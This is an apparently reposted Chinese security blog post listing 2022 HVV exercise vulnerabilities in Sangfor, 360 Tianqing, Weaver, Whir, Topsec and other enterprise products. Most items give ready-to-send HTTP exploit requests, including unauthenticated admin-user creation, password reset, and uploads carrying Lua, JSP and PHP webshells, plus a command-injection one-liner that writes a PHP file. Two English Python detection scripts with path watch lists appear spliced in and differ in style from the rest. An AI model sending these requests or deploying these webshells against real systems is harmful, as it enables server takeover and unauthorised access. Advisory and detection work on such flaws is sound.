【2022 HVV (护网) Intelligence Update】Latest HVV Vulnerabilities Disclosed, with POCs

admin · 2022-07-30 00:44:49 · 1,883 views · 9,120 characters · reading time 30 min 24 s



Disclaimer





The following POCs are not guaranteed to work; use for illegal purposes is prohibited; they are provided for learning only!





1. Sangfor (深信服) VPN arbitrary user addition vulnerability

Severity: Critical, 0day vulnerability

Affected scope: unknown

Details: the access control of the user-management interface is flawed, so an attacker can add arbitrary users.



Reference POC: POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=e52021a4c9c962ac9cc647effddcf57242d152d9 HTTP/1.1Host: xxxxxxCookie: language=zh_CN; sinfor_session_id=W730120C88755A7D932019B349CCAC63; PHPSESSID=cb12753556d734509d4092baabfb55dd; x-anti-csrf-gcs=A7DBB1DC0050737E; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%22-1%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7DContent-Length: 707Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36Sec-Ch-Ua-Platform: "macOS"Accept: */*Origin: https://xxxxxxX-Forwarded-For: 127.0.0.1X-Originating-Ip: 127.0.0.1X-Remote-Ip: 127.0.0.1X-Remote-Addr: 127.0.0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://xxxxxx/html/tpl/userMgt.html?userid=0&groupid=-1&createRole=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close

name=admin1&note=admin1&passwd=Admin%40123&passwd2=Admin%40123&phone=&grpid=-1&grptext=%2F%E9%BB%98%E8%AE%A4%E7%94%A8%E6%88%B7%E7%BB%84&selectAll=1&b_inherit_auth=1&b_inherit_grpolicy=1&is_Autoip=1&allocateip=0.0.0.0&gqsj=1&ex_time=2027-07-29&is_enable=1&is_public=1&is_pwd=1&first_psw_type=-1&second_server=&auth_type=0&ext_auth_id=&token_svr_id=%E8%AF%B7%E9%80%89%E6%8B%A9&grpolicy_id=0&grpolicytext=%E9%BB%98%E8%AE%A4%E7%AD%96%E7%95%A5%E7%BB%84&roleid=&roletext=&year=&month=&day=&isBindKey=&userid=0&crypto_key=&szcername=&caid=-1&certOpt=0&create_time=&sec_key=&first_psw_name=%E6%9C%AC%E5%9C%B0%E6%95%B0%E6%8D%AE%E5%BA%93&first_psw_id=&second_psw_name=&second_psw_id=&is_extauth=0&secondAuthArr=%5B%5D




2. DBAppSecurity (安恒) Data Brain API gateway arbitrary password reset vulnerability

Severity: Critical;

Possibly a 0day vulnerability; an exploitation POC has been captured in the wild;

Affected scope: unknown;

Details: the front-end code contains the password-reset link as well as the password encryption method



POC as follows:

POST /q/common-permission/public/users/forgetPassword HTTP/1.1 Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept-Language: en-US,en;q=0.5 Content-type: application/json Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 104 {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}




3. 360 Tianqing (天擎) arbitrary file upload

Severity: Critical

Affected scope: unknown; likely a 0day

Details: /api/client_upload_file.json has an arbitrary file upload vulnerability



POC as follows:

POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1 Host: xxxxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 323 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox Q Referer: xxxxx Accept-Encoding: gzip ------WebKitFormBoundaryLx7ATxHThfk91oxQ Content-Disposition: form-data; name="file"; filename="flash.php" Content-Type: application/xxxx if ngx.req.get_uri_args().cmd then cmd = ngx.req.get_uri_args().cmd local t = io.popen(cmd) local a = t:read("*all") ngx.say(a) end------WebKitFormBoundaryLx7ATxHThfk91oxQ--




4. Whir (万户) OA file upload vulnerability

Severity: Critical

Details: the /defaultroot/officeserverservlet path has a file upload vulnerability



POC:POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li ke Gecko) Chrome/89.0.4389.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN Connection: close DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE VQ OPTION=U0FWRUZJTEU= RECORDID= isDoc=dHJ1ZQ== moduleType=Z292ZG9jdW1lbnQ= FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA== 111111111111111111111111111111111111111 <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";/*man ba*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec (k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6 4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex t);}%>



DBSTEP V3.0 170 0 1000

170 controls the position in the message from which the content is read

1000 controls the size of the webshell source content
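To make the header semantics just described usable on the defending side, here is an added Python example (not code from the page or from the vendor) that parses a DBSTEP V3.0 body the way the page explains it: the third header field is the offset at which the file content starts and the fifth field is its length. It base64-decodes the key=value block that precedes the content, skips padding lines without an "=" (the run of "1" characters in the page's request), slices the content, and flags a SAVEFILE whose FILETYPE carries path traversal or a server-executable extension, or whose content carries JSP scriptlet tags. The sample fields and content, and the fixed-width header layout used by build_dbstep, are constructed assumptions for this example; the real product's exact framing may differ.

```python
import base64
import re

# Patterns a gateway or WAF should refuse in the target file name of an upload:
# directory traversal, or an extension the application server would execute.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
EXEC_EXT = re.compile(r"\.(jsp|jspx|php|aspx?|war)$", re.IGNORECASE)

# Constructed sample fields: the decoded values of the key=value block shown on this page.
SAMPLE_FIELDS = {
    "DBSTEP": "DBSTEP",
    "OPTION": "SAVEFILE",
    "RECORDID": "",
    "isDoc": "true",
    "moduleType": "govdocument",
    "FILETYPE": "../../upgrade/6.jsp",
}
# Constructed placeholder content; it only needs the "<%" marker that JSP source carries.
SAMPLE_CONTENT = b'<% out.println("constructed placeholder"); %>'


def build_dbstep(fields: dict, payload: bytes) -> bytes:
    """Build a DBSTEP V3.0 body for testing (assumed layout: one fixed-width header line,
    base64 key=value lines, then the raw file content starting at the stated offset)."""
    kv = "".join(
        f"{k}={base64.b64encode(v.encode()).decode()}\n" for k, v in fields.items()
    ).encode()
    header_len = len("DBSTEP V3.0 ") + 5 + 3 + 5 + 1  # 5-digit offset, " 0 ", 5-digit size, newline
    offset = header_len + len(kv)
    header = f"DBSTEP V3.0 {offset:5d} 0 {len(payload):5d}\n".encode()
    assert len(header) == header_len
    return header + kv + payload


def inspect_dbstep(body: bytes) -> dict:
    """Parse the header, decode the fields, slice the content, and return findings."""
    first_nl = body.index(b"\n")
    parts = body[:first_nl].decode("ascii", "replace").split()
    if len(parts) != 5 or parts[0] != "DBSTEP":
        raise ValueError("not a DBSTEP V3.0 message")
    offset, size = int(parts[2]), int(parts[4])  # the "170" and "1000" of the page's header
    fields = {}
    for line in body[first_nl + 1:offset].decode("utf-8", "replace").splitlines():
        if "=" not in line:
            continue  # padding lines carry no field
        key, value = line.split("=", 1)
        try:
            fields[key] = base64.b64decode(value.strip(), validate=True).decode("utf-8", "replace")
        except ValueError:
            fields[key] = value.strip()  # keep undecodable values verbatim for the analyst
    content = body[offset:offset + size]
    findings = []
    target = fields.get("FILETYPE", "")
    if TRAVERSAL.search(target):
        findings.append("path traversal in FILETYPE")
    if EXEC_EXT.search(target):
        findings.append("server-executable extension in FILETYPE")
    if fields.get("OPTION") == "SAVEFILE" and b"<%" in content:
        findings.append("JSP scriptlet tags in SAVEFILE content")
    return {"fields": fields, "content_length": len(content), "findings": findings}


if __name__ == "__main__":
    result = inspect_dbstep(build_dbstep(SAMPLE_FIELDS, SAMPLE_CONTENT))
    print(result["fields"]["FILETYPE"], result["findings"])
```

Run against the constructed sample, the FILETYPE decodes to ../../upgrade/6.jsp and all three findings fire; the same message with FILETYPE set to a plain document name and non-script content produces no findings, which is the shape a blocking rule in front of the servlet should distinguish.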






5. Weaver (泛微) OA file upload

Severity: Critical

Details: /workrelate/plan/util/uploaderOperate.jsp has a file upload vulnerability



POC:POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 393 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="secId" 1 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="Filedata"; filename="testlog.txt" Test ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="plandetailid" 1 ------WebKitFormBoundarymVk33liI64J7GQaK—




Weaver (泛微) OA /defaultroot/officeserverservlet:

Confirmed as a previously known (historical) vulnerability;

Details: file upload via the /officeserverservlet path



POC:POST /OfficeServer HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 207 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name="aaa" {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'} ------WebKitFormBoundarymVk33liI64J7GQaK—



7. Weaver (泛微) eoffice10 unauthenticated getshell (eoffice10/version.json):

Severity: Critical, possibly a 0day vulnerability;

Details: the version number can be read from http://XXXXXXX:8010/eoffice10/version.json



<form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' enctype="multipart/form-data" > <input type="file" name="FileData"/></br></br> <input type="text" name="FormData" value="1"/></br></br> <button type=submit value="上传">上传</button> </form>
POC: POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: XXXXXXXX:8010 Content-Length: 378 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FileData"; filename="1.jpg" Content-Type: image/jpeg <?php echo md5(1);?> ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FormData" {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--



8. WebLogic middleware arbitrary command execution vulnerability

Severity: Critical; the vendor has not yet released a patch

Affected scope: unknown

Details: an attacker can send malicious content through the T3/IIOP interfaces, leading to arbitrary command execution





9. XxxNC front-end deserialization vulnerability:

Severity: Critical, confirmed as a previously known (historical) vulnerability;

Affected version: NC 6.5;




10. Txxxb front-end unauthenticated deserialization vulnerability:

Severity: Critical, confirmed 0day vulnerability, currently being exploited in the wild;






11. Topsec (天融信) 天眼 system command execution 0day vulnerability

Severity: Critical

Affected scope: unknown

Details: the attacker encrypts the attack payload with the serial number, then uploads the payload to the server through a second, unauthenticated interface; the server decrypts and executes it, giving remote command execution and control of the server.

Emergency mitigation:

1) First block access to the vulnerable paths: /skyeye/home/security_service/heartbeat and /skyeye/home/security_service/add_commands

2) Check whether any security traffic-monitoring devices are mapped to the Internet; if so, stop the mapping without exception

3) Add the attack signatures to monitoring: /skyeye/home/security_service/heartbeat and /skyeye/home/security_service/add_commands





12. Topsec (天融信) Internet Behavior Management System: one-line webshell (一句话木马)



/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
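Step 3) of item 11's emergency mitigation asks for the vulnerable paths to be added as monitoring signatures. As an added example (not code from the page or from any of the vendors named on it), the Python script below applies that idea to every request path named on this page: it parses combined-format web server access log lines, matches the path, and for the endpoints where the page shows the dangerous part in the query string (items 1, 3 and 12) also checks the parameter (the AddUser action, traversal in filename, shell metacharacters in blocks[0]). Hits from outside RFC 1918 address space are marked external, which is what step 2) is looking for. The log lines, their addresses and the rule labels are constructed for this example.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request paths named on this page, keyed to the item they belong to (labels are ours).
WATCHED_PATHS = {
    "/skyeye/home/security_service/heartbeat": "Topsec SkyEye heartbeat (item 11)",
    "/skyeye/home/security_service/add_commands": "Topsec SkyEye add_commands (item 11)",
    "/api/client_upload_file.json": "360 Tianqing client_upload_file (item 3)",
    "/defaultroot/officeserverservlet": "Whir/Weaver officeserverservlet (items 4, 6)",
    "/OfficeServer": "Weaver OfficeServer (item 6)",
    "/workrelate/plan/util/uploaderOperate.jsp": "Weaver OA uploaderOperate (item 5)",
    "/eoffice10/server/public/iWebOffice2015/OfficeServer.php": "Weaver eoffice10 OfficeServer.php (item 7)",
    "/q/common-permission/public/users/forgetPassword": "DBAppSecurity forgetPassword (item 2)",
    "/cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php": "Sangfor VPN HttpHandler (item 1)",
    "/view/IPV6/naborTable/static_convert.php": "Topsec static_convert (item 12)",
}

# Combined log format: client, identity, user, [time], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL = re.compile(r"\.\.[\\/]")
SHELL_META = re.compile(r"[|;`&\n]|\$\(|>>?")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample log lines (not from the page); addresses are from documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jul/2022:00:44:49 +0800] "POST /skyeye/home/security_service/add_commands HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Jul/2022:00:45:01 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [30/Jul/2022:00:45:10 +0800] "POST /api/client_upload_file.json?mid=1&md5=2&filename=../../lua/x.LUAC HTTP/1.1" 200 77 "-" "curl/7.79"',
    '198.51.100.4 - - [30/Jul/2022:00:46:00 +0800] "POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=User&action=AddUser&token=abc HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [30/Jul/2022:00:47:00 +0800] "GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20hello%0a HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [30/Jul/2022:00:48:00 +0800] "POST /defaultroot/officeserverservlet HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]


def is_internal(ip: str) -> bool:
    """True for RFC 1918 sources; anything else counts as an external (mapped) client."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def classify(target: str) -> list:
    """Return the reasons a request target deserves an alert, or [] for unrelated paths."""
    u = urlsplit(target)
    path = unquote(u.path)
    params = parse_qs(u.query, keep_blank_values=True)  # values are percent-decoded here
    label = next((v for k, v in WATCHED_PATHS.items() if path == k or path.startswith(k + "/")), None)
    if label is None:
        return []
    reasons = [label]
    if path == "/api/client_upload_file.json" and TRAVERSAL.search(params.get("filename", [""])[0]):
        reasons.append("filename contains path traversal")
    if path.endswith("/HttpHandler.php") and params.get("action", [""])[0] == "AddUser":
        reasons.append("AddUser action on user-management handler")
    if path.endswith("/static_convert.php") and SHELL_META.search(params.get("blocks[0]", [""])[0]):
        reasons.append("shell metacharacters in blocks[0]")
    return reasons


def scan(lines) -> list:
    """Run the rules over access log lines; one alert dict per matching request."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            alerts.append({
                "ip": m["ip"], "method": m["method"], "path": urlsplit(m["target"]).path,
                "status": int(m["status"]), "external": not is_internal(m["ip"]),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["ip"], alert["method"], alert["path"], alert["external"], alert["reasons"])
```

On the constructed sample the scanner raises five alerts and ignores the ordinary GET; the officeserverservlet hit from 10.0.0.8 is reported as internal, so an analyst can prioritise the four external ones, which is the kind of triage step 2) of the mitigation implies. Path-only matches such as /OfficeServer will also catch legitimate traffic, so in production they belong in a watch list rather than a blocking rule.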






Originally published on the WeChat public account 安全透视镜: 【2022 HVV (护网) Intelligence Update】Latest HVV Vulnerabilities Disclosed, with POCs

Posted by admin on 2022-07-30 00:44:49. When reposting, please keep this link (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/1210653.html
